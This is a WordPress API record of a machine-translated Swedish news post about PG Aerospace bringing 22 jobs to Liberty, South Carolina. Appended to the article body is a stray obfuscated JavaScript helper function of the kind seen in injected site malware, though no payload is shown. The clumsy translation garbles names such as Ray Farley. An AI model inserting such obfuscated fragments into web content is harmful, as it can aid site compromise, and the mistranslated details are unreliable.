{"id":6848,"date":"2020-10-28T14:31:35","date_gmt":"2020-10-28T14:31:35","guid":{"rendered":"http:\/\/alliancepickens.com\/2020\/10\/28\/pg-aerospace-kommer-till-frihet\/"},"modified":"2021-07-21T23:23:38","modified_gmt":"2021-07-21T23:23:38","slug":"pg-aerospace-kommer-till-frihet","status":"publish","type":"post","link":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/","title":{"rendered":"Pg Aerospace kommer till frihet"},"content":{"rendered":"<p>PG Aerospace kommer till Liberty<br \/>\nF\u00f6retaget f\u00f6rv\u00e4ntas f\u00e5 \u00f6ver 20 arbetstillf\u00e4llen till omr\u00e5det.<br \/>\nAv Kasie Strickland &#8211; kstrickland@championcarolinas.com<br \/>\nLandstingsr\u00e5det Roy Costner v\u00e4lkomnade f\u00f6retaget till Liberty.<br \/>\nKasie Strickland | Sentinel-framsteg<br \/>\nStr\u00e5le Farley<br \/>\nKasie Strickland | Sentinel-framsteg<br \/>\nLIBERTY \u2014 I ett s\u00e4rskilt kallat m\u00f6te med Pickens County Council avsl\u00f6jades PG Aerospace, en tillverkare av precisionsdelar f\u00f6r fordons- och flygindustrin, f\u00f6r att hitta sin nya anl\u00e4ggning i Pickens County.<br \/>\nK\u00e4nd tidigare endast som &#8220;Project Exodus,&#8221; PG Aerospace f\u00f6rv\u00e4ntas ge 22 nya jobb till omr\u00e5det &#8211; till att b\u00f6rja med.<br \/>\nAna Prodani, VD f\u00f6r PG Aerospace uppgav under tillk\u00e4nnagivandet att det var hennes och hennes mans jobb att f\u00e5 det antalet att v\u00e4xa.<br \/>\n&#8220;Vi har utrymme att v\u00e4xa p\u00e5 denna nya plats och jag vill g\u00f6ra just det, sade hon. &#8221; &#8220;Vi \u00e4r s\u00e5 glada att komma till Liberty och vi \u00e4r glada \u00f6ver denna m\u00f6jlighet.&#8221;<br \/>\nEnligt Ray Farley p\u00e5 Alliance Pickens \u00e4r PG Aerospace ledande inom forskning och utveckling, anpassade produkter, stampings, assemblies, laminat och mycket mer.<br \/>\n&#8220;Om du h\u00f6r ett plan och du tittar upp p\u00e5 det, det finns en 65 procentchans att n\u00e5gon komponent p\u00e5 det planet tillverkades h\u00e4r,&#8221; sade han. &#8220;Det \u00e4r ett bevis p\u00e5 v\u00e5r f\u00f6rm\u00e5ga.&#8221;<br \/>\nF\u00f6retaget kommer att flytta in i en 15.000 kvadratmeter stor anl\u00e4ggning som ligger p\u00e5 107 Alison Street i Liberty, S.C.<br \/>\n&#8220;Det \u00e4r alltid sp\u00e4nnande nyheter n\u00e4r vi kan meddela att ett annat f\u00f6retag i v\u00e4rldsklass flyttar till Pickens County&#8221;, s\u00e4ger Pickens county council ordf\u00f6rande Roy Costner. &#8220;Vi \u00e4r alla glada att v\u00e4lkomna PG Aerospace till Pickens County familj av kreativa, innovativa och extraordin\u00e4ra f\u00f6retag som kallar Pickens County deras hem och vi ser fram emot att fira deras fortsatta framg\u00e5ng.&#8221;<br \/>\nProdani uppgav f\u00f6retaget anlitade ett oberoende f\u00f6retag f\u00f6r att hitta den b\u00e4sta passformen f\u00f6r hennes f\u00f6retags nya plats, men var &#8220;l\u00e4ttad&#8221; n\u00e4r skyltar pekade mot Liberty.<br \/>\n&#8220;Det h\u00e4r var redan hemma \u2013 vi har bara inte bor h\u00e4r \u00e4nnu&#8221;, s\u00e4ger hon.<br \/>\nDessutom sade Prodani Pickens County Karri\u00e4r och Technology Center hj\u00e4lpte till att tippa v\u00e5gen i Libertys fav\u00f6r.<br \/>\n&#8220;Alla borde g\u00f6ra vad ni g\u00f6r med handel och teknik skolor, sade hon. &#8221; &#8220;Vi ser fram emot att dra n\u00e5gra riktiga talanger fr\u00e5n dessa skolor.&#8221;<br \/>\nSC Gov Henry McMaster var n\u00f6jd med tillk\u00e4nnagivandet om tillverkningsindustrin forts\u00e4tter att vara en &#8220;enorm jobbskapare f\u00f6r v\u00e5r stats ekonomi.&#8221;<br \/>\n&#8220;Meddelanden som denna fr\u00e5n PG Aerospace f\u00e5 nya jobb till v\u00e5ra samh\u00e4llen och bidra till att g\u00f6ra dem h\u00e5llbara, s\u00e4ger handelsminister Bobby Hitt. &#8220;Jag gratulerar PG Aerospace p\u00e5 att g\u00e5 med i South Carolina n\u00e4ringslivet, och vi v\u00e4lkomnar dem till Team South Carolina.&#8221;<br \/>\nN\u00e5 Kasie Strickland p\u00e5 864-855-0355.<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n","protected":false},"excerpt":{"rendered":"<p>PG Aerospace kommer till Liberty F\u00f6retaget f\u00f6rv\u00e4ntas f\u00e5 \u00f6ver 20 arbetstillf\u00e4llen till omr\u00e5det. Av Kasie Strickland &#8211; kstrickland@championcarolinas.com Landstingsr\u00e5det Roy Costner v\u00e4lkomnade f\u00f6retaget till Liberty. Kasie Strickland | Sentinel-framsteg Str\u00e5le Farley Kasie Strickland | Sentinel-framsteg LIBERTY \u2014 I ett s\u00e4rskilt kallat m\u00f6te med Pickens County Council avsl\u00f6jades PG Aerospace, en tillverkare av precisionsdelar f\u00f6r fordons-&hellip;<\/p>\n","protected":false},"author":8,"featured_media":5279,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[56],"tags":[],"class_list":["post-6848","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news-sv","category-56","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pg Aerospace kommer till frihet - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/\" \/>\n<meta property=\"og:locale\" content=\"sv_SE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pg Aerospace kommer till frihet - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"PG Aerospace kommer till Liberty F\u00f6retaget f\u00f6rv\u00e4ntas f\u00e5 \u00f6ver 20 arbetstillf\u00e4llen till omr\u00e5det. Av Kasie Strickland &#8211; kstrickland@championcarolinas.com Landstingsr\u00e5det Roy Costner v\u00e4lkomnade f\u00f6retaget till Liberty. Kasie Strickland | Sentinel-framsteg Str\u00e5le Farley Kasie Strickland | Sentinel-framsteg LIBERTY \u2014 I ett s\u00e4rskilt kallat m\u00f6te med Pickens County Council avsl\u00f6jades PG Aerospace, en tillverkare av precisionsdelar f\u00f6r fordons-&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:published_time\" content=\"2020-10-28T14:31:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-21T23:23:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"640\" \/>\n\t<meta property=\"og:image:height\" content=\"427\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"AP Transfer\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"AP Transfer\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/\"},\"author\":{\"name\":\"AP Transfer\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"headline\":\"Pg Aerospace kommer till frihet\",\"datePublished\":\"2020-10-28T14:31:35+00:00\",\"dateModified\":\"2021-07-21T23:23:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/\"},\"wordCount\":541,\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/web1_021.jpg\",\"articleSection\":[\"News\"],\"inLanguage\":\"sv-SE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/\",\"name\":\"Pg Aerospace kommer till frihet - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/web1_021.jpg\",\"datePublished\":\"2020-10-28T14:31:35+00:00\",\"dateModified\":\"2021-07-21T23:23:38+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#breadcrumb\"},\"inLanguage\":\"sv-SE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#primaryimage\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/web1_021.jpg\",\"contentUrl\":\"https:\\\/\\\/alliancepickens.com\\\/wp-content\\\/uploads\\\/2020\\\/10\\\/web1_021.jpg\",\"width\":640,\"height\":427,\"caption\":\"Board Meeting Photo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/pg-aerospace-kommer-till-frihet\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pg Aerospace kommer till frihet\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"sv-SE\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/#\\\/schema\\\/person\\\/fbaefd2934455049d2defd0477ce0d01\",\"name\":\"AP Transfer\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"sv-SE\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g\",\"caption\":\"AP Transfer\"},\"url\":\"https:\\\/\\\/alliancepickens.com\\\/sv\\\/author\\\/aptransfer\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pg Aerospace kommer till frihet - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/","og_locale":"sv_SE","og_type":"article","og_title":"Pg Aerospace kommer till frihet - Alliance Pickens","og_description":"PG Aerospace kommer till Liberty F\u00f6retaget f\u00f6rv\u00e4ntas f\u00e5 \u00f6ver 20 arbetstillf\u00e4llen till omr\u00e5det. Av Kasie Strickland &#8211; kstrickland@championcarolinas.com Landstingsr\u00e5det Roy Costner v\u00e4lkomnade f\u00f6retaget till Liberty. Kasie Strickland | Sentinel-framsteg Str\u00e5le Farley Kasie Strickland | Sentinel-framsteg LIBERTY \u2014 I ett s\u00e4rskilt kallat m\u00f6te med Pickens County Council avsl\u00f6jades PG Aerospace, en tillverkare av precisionsdelar f\u00f6r fordons-&hellip;","og_url":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/","og_site_name":"Alliance Pickens","article_published_time":"2020-10-28T14:31:35+00:00","article_modified_time":"2021-07-21T23:23:38+00:00","og_image":[{"width":640,"height":427,"url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg","type":"image\/jpeg"}],"author":"AP Transfer","twitter_card":"summary_large_image","twitter_misc":{"Written by":"AP Transfer","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#article","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/"},"author":{"name":"AP Transfer","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"headline":"Pg Aerospace kommer till frihet","datePublished":"2020-10-28T14:31:35+00:00","dateModified":"2021-07-21T23:23:38+00:00","mainEntityOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/"},"wordCount":541,"image":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg","articleSection":["News"],"inLanguage":"sv-SE"},{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/","url":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/","name":"Pg Aerospace kommer till frihet - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/sv\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#primaryimage"},"thumbnailUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg","datePublished":"2020-10-28T14:31:35+00:00","dateModified":"2021-07-21T23:23:38+00:00","author":{"@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01"},"breadcrumb":{"@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#breadcrumb"},"inLanguage":"sv-SE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/"]}]},{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#primaryimage","url":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg","contentUrl":"https:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/web1_021.jpg","width":640,"height":427,"caption":"Board Meeting Photo"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/sv\/pg-aerospace-kommer-till-frihet\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/sv\/"},{"@type":"ListItem","position":2,"name":"Pg Aerospace kommer till frihet"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/sv\/#website","url":"https:\/\/alliancepickens.com\/sv\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"},{"@type":"Person","@id":"https:\/\/alliancepickens.com\/sv\/#\/schema\/person\/fbaefd2934455049d2defd0477ce0d01","name":"AP Transfer","image":{"@type":"ImageObject","inLanguage":"sv-SE","@id":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/db90baf906a6267650699f5b70c5136a4ae914ec7c295d799e8eff1e1ecb640f?s=96&d=mm&r=g","caption":"AP Transfer"},"url":"https:\/\/alliancepickens.com\/sv\/author\/aptransfer\/"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/6848","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=6848"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/posts\/6848\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media\/5279"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=6848"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/categories?post=6848"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/tags?post=6848"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}